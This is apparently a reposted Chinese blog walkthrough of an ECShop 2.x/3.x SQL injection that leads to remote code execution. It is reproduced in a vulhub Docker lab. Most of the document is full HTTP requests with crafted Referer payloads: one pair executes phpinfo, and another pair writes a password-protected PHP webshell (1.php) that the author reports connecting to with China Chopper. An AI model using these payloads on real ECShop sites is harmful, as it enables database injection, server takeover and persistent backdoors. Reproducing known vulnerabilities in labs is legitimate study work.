ECShop 2.x/3.x SQL注入/任意代码执行漏洞
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。
漏洞环境
我们先下载环境,在github有别人直接搭建好的docker环境我们直接拿来用即可
git clone git://github.com/vulhub/vulhub.git cd vulhub/ecshop/xianzhi-2017-02-82239600/ docker-compose up -d
访问IP:8080即可看到ecshop2.7.3的安装页面。
安装配置这样设置即可,数据库密码为root
这样就算搭建完成了
访问IP:8081即可看到ecshop3.6.0的安装页面。
安装配置这样设置即可,数据库密码为root
这样就算搭建完成了
影响版本
Ecshop 2.x
Ecshop 3.x-3.6.0
漏洞复现
Ecshop 2.x
点击用户抓包,然后修改referer值判断漏洞是否存在payload如下
GET /user.php HTTP/1.1 Host: 192.168.200.23:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1‘ UNION/*";} Connection: close Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0发现phpinfo命令执行成功
我们上传一个webshell,payload如下
GET /user.php HTTP/1.1 Host: 192.168.200.23:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152625255524a58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:3:"‘/*";} Content-Length: 0 Connection: close Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0上传的webshell名字为1.php,密码为EDI,菜刀连接成功
Ecshop 3.x
点击用户抓包,然后修改referer值判断漏洞是否存在payload如下
GET /user.php HTTP/1.1 Host: 192.168.200.23:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1‘ UNION/*";} Connection: close Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0发现phpinfo命令执行成功
我们上传一个webshell,payload如下
GET /user.php HTTP/1.1 Host: 192.168.200.23:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer:45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:286:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152625255524a58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:9:"‘ union/*";} Connection: close Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0上传的webshell名字为1.php,密码为EDI,菜刀连接成功
原文:https://www.cnblogs.com/blankunbeaten/p/15005958.html
